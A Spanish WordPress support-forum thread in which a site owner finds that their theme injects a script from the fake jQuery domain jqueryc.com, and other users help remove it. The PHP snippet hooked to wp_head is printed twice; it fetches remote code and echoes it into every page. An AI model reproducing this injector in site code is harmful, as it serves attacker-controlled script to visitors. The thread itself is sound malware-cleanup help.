Soporte » Diseño – Temas y plantillas » Problema con jqueryc.com infectado, avast bloquea mi web

  • Hola amigos, acudo al foro para solicitar un poco de ayuda y opiniones, les comento mi caso.

    En dias pasados el antivirus avast bloqueba mi web y no permitia el ingreso para quienes usamos este antivirus, busque y resulta que el problema no era tanto de mi web, si no mas bien de esta: http://www.jqueryc.com/jquery-1.6.3.min.js

    Tenia varios plugins que usaban referencia a esta web, tuve que borrarlos y adicional una parte de mi tema tiene este codigo:

    // Adds Theme Jquery Function
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    Le borre la url jqueryc.com y funciono bien mi pagina ya no me la detectaba con codigo maligno, pero el problema es que ahora las entradas que quiero poner en el slider no quedan bien, solo quedaron bien las que ya estaban posteadas, las nuevas que voy a agregar sale una imagen en el slider y mas abajo vuelve y sale la imagen por encima de las entradas.

    He cambiado esa url por esta: http://dalellanero.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 pero no me funciona.

    Mi página es http://www.dalellanero.com

    Necesito ayuda amigos, por favor alguien que me pueda indicar como solucionarlo, ya que a parte del slider tengo otras cosas que no me funcionan tampoco, como lo es los comentarios de facebook.

Viendo 15 respuestas - de la 1 a la 15 (de un total de 18)
  • Hola.
    Creo que el problema que estás teniendo proviene de que estas llamando mal el script jQuery. Probá usar el que viene con WordPress (creo que está en wp-includes/js/jquery pero no estoy 100% seguro) y si no anda, probá llamarlo desde las Google Libraries API.
    !Saludos!

    Hola Dalellanero!

    Si quieres comenta la funcion o comenta la linea de codigo condicional así:

    if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
    if (function_exists('curl_init')){
    $url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();
    $timeout = 5;
    curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout)
    ;$data = curl_exec($ch);
    curl_close($ch);
    echo $data;
    }
    }
     // add_action('wp_head', 'insert_jquery_theme');
    }

    Solo debes comentar la linea //add_action('wp_head', 'insert_jquery_theme');

    Guarda los cambios, a continuación edita el archivo header.php de tu theme y agrega la siguiente linea dentro de la etiqueta <hedad> y </head>

    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>

    Guardas el header y todo debería funcionar normalmente.

    saludos

    @jeickball: comentar esa línea es una buena idea, pero la forma en la que sugerís incluir jQuery de las Librerías API de Google no lo es. WP recomienda siempre usar wp_register_script, wp_enqueue_script y wp_enqueue_scripts para incluir scripts de JS.
    @dalellanero: Si el código que compartió y modificó jecikall proviene de tu plantilla, te recomiendo que cambies la plantilla ahora mismo o trates de bajártela de nuevo de la fuente oficial porque tiene código malicioso que es el que está generando el problema que informaste.
    Además, creo que no es necesario incluir jQuery de nuevo luego de comentar la línea sugerida por jeickall ya que me fijé en tu código fuente y jQuery se carga en la línea 57. Probá comentar la línea sugerida por jeickall y fijate si jQuery sigue apareciendo. Si no aparece, avisanos y lo vemos.
    ¡Saludos!

    Iniciador del debate DaleLlanero

    (@dalellanero)

    Si amigo, ese era mi problema que el codigo malicioso esta aqui: http://www.jqueryc.com/jquery-1.6.3.min.js

    Entonces mi web aparecia como infectada al hacer la llamada de esa libreria, pues cambie esa url por un «#» y funciono bien, creo que no le hacia falta eso, esta funcionando bien.

    Les agradezco mucho sus opiniones he aprendido un poquito mas con ellas.

    Si amigo, ese era mi problema que el codigo malicioso esta aqui

    Efectivamente. Suelen pasar estas cosas con plantillas descargadas de la red. Más allá de cómo la hayas obtenido, te recomiendo que si decidís seguir usándola, revises (o hagas revisar) el código de la plantilla exhaustivamente ya que es muy probable que siga habiendo código malicioso escondido en algún otro lado, lo que puede dar lugar a hacks o vulnerabilidades serias.
    ¡Saludos!

    Hola a todos, tengo el mismo problema con mi página. Ayer actualicé varios plugings y de pronto me aparece en la cabecera el mensaje «Not Found
    The requested URL /jquery-1.6.3.min.js was not found on this server.»
    El problema que tengo es…que no soy programador y lo paso bastante mal siempre que tengo que solucionar incidencias de este estilo. POdeis ayudarme??? Muchísimas gracias!!! La página es http://www.tuoposicion.net

    Hola.
    No es del todo seguro, pero lo más probable es que te hayan jaqueado el sitio. Si leés inglés, te recomiendo este artículo del Codex.
    Acá también tenés un hilo (inglés) en el que hay más enlaces útiles. Por último, este es un muy buen post, suponiendo que la fuente de tu ataque es un backdoor (no es seguro).
    Saludos.

    Gracias por tu respuesta Marventus. He probado a explorarlo con la Herramienta de Google Webmaster Tools pero no identifica ningún error. Me estoy volviendo loco!!!! Llevo dos días con ello y no consigo quitarlo. De la empresa de hosting me dicen que tengo que instalar la libreria jquery. Estoy muy perdido.

    Uh no, no. A ver: lo que te está sucediendo es probablemente que te han hackeado el sitio, y el archivo que se está queriendo cargar (un falso jquery) apunta a una URL que ha sido dada de baja o directamente bloqueada, por eso el error de «Not Found».
    Antes de darte instrucciones sobre cómo solucionar este problema, necesito saber si estás usando alguna plantilla o plugin customizado directamente por ti mismo o por algún programador, ya que unoo de los pasos consiste en vaciar completamente el directorio raíz de tu carpeta public_html.

    Para el theme utilizo la plantilla «The Morning After Theme», y plugings tengo varios instalados. Por si sirve de ayuda los detallado a continuación Akismet, All in One SEO Pack, Formulario de Contacto 7, Display widgets, Dynamic Widgets, Editor Extender, Facebook, Twitter & Google+ Social Widgets, Feedburner Email Widget, Google Analytics for WordPress, Google XML Sitemaps, Meteor Slides, Quick Adsense, Restore jQuery, Simple Facebook Plugin, Simple Local Avatars, Social Media Widget, Spotify Embed, Spotify Widget, Thumbnail Scroller (WordPress Plugin), W3 Total Cache, WordPress PopUp, WP Survey And Quiz Tool, WPtouch, WYSIWYG Widgets, Youtube shortcode.

    Ok. Sé que tienes esa plantilla porque puedo verlo desde el código fuente. Lo que quería saber era si le habías realizado alguna modificación directamente, dado que, si la tenemos que descargar de vuelta, dichos cambios se perderían.
    Lo mismo para cualquier plugin que hayas podido modificar o hecho modificar.
    La idea es no hacerte perder tiempo ni trabajo ya realizados, 🙂 Si no le has hecho ninguna modificación, entonces podemos proceder con el tutorial.

    Puff he realizado la muchísimos de cambios!!! Si tuviese que volver a la versión inicial creo que me daría un ataque. Al no ser informático me han llevado mucho tiempo, prueba y error, foros…Los plugings sin embargo no los he modificado.

    Lamentablemente, no es para nada recomendable dejar la plantilla así como está ya que lo más probable es que el código maligno provenga de allí. Podemos probar lo siguiente para estar seguros: trata de activar una plantilla diferente a ver qué sucede (si desaparece el error o no).

    acabo de hacer una prueba con otra plantilla y se sigue viendo, 🙁

Viendo 15 respuestas - de la 1 a la 15 (de un total de 18)
  • El debate ‘Problema con jqueryc.com infectado, avast bloquea mi web’ está cerrado a nuevas respuestas.